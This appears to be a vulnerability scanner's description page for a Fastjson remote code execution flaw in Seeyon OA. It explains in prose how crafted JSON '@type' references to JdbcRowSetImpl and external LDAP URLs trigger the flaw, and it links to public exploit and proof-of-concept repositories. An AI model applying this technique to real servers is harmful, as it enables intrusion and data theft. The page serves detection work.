Seeyon OA Fastjson Remote Code Execution Scanner

Seeyon OA is a popular office automation software widely utilized in corporate environments to streamline internal workflows and communications. Developed by Seeyon, it serves enterprises seeking effective management solutions for their daily office tasks, improving efficiency in handling documents and communication. Often deployed in larger organizations, Seeyon OA caters to both administrative and operational needs by providing tools for task management, message handling, and organizational communication. The software integrates various modules to ensure cohesive operation within a business framework. Its main users include different levels of staff within corporate settings who rely on the software for task orchestration and communication facilitation. Users appreciate the platform for its comprehensive feature set, designed to optimize organizational processes.

The Remote Code Execution vulnerability in Seeyon OA, notably through its Fastjson component, is critical, allowing attackers to maliciously execute code on the server. This vulnerability arises from how data is processed within Fastjson libraries, accepting user input without stringent validation. Unvalidated inputs can lead to arbitrary code execution due to the templating and data handling methods of the Fastjson component. Bad actors can exploit this through specific payloads capable of injecting harmful instructions into the execution flow. Such exploits can grant attackers unauthorized control, posing significant threats to server integrity. Notably, the vulnerability's nature can make it a gateway for more severe breaches.

The technical details of this vulnerability involve manipulating HTTP POST requests with specially crafted JSON payloads containing certain "@type" references. These references expose the underlying Java classes, such as JdbcRowSetImpl, and allow for malicious operations via external LDAP URLs. A crucial aspect of this vulnerability is its reliance on misconfigured rmi/ldap services, which can be triggered through manipulated JSON payloads sent to specific endpoints. The matchers in place verify successful exploitation by checking for Fastjson-related exceptions and responses involving DNS interactions through external links. Attackers leverage this to execute arbitrary commands on compromised systems. Ensuring the presence of exceptions or certain strings in responses helps confirm successful exploitation.

The potential effects of exploiting this vulnerability are significant, as it can lead to full compromise of the affected server. Attackers can execute arbitrary commands, potentially installing malware, extracting sensitive data, or creating backdoors for persistent access. Such infiltrations undermine organizational security, risking data confidentiality, integrity, and availability. This vulnerability can also facilitate lateral movement within the network, potentially affecting other systems and services connected to Seeyon OA. Additionally, attackers might use exploited servers to launch further attacks on external systems or exfiltrate sensitive information, leveraging the compromised server as a pivot point.

REFERENCES

• https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
• https://github.com/hktalent/scan4all/blob/main/pocs_go/seeyon/SeeyonFastjson.go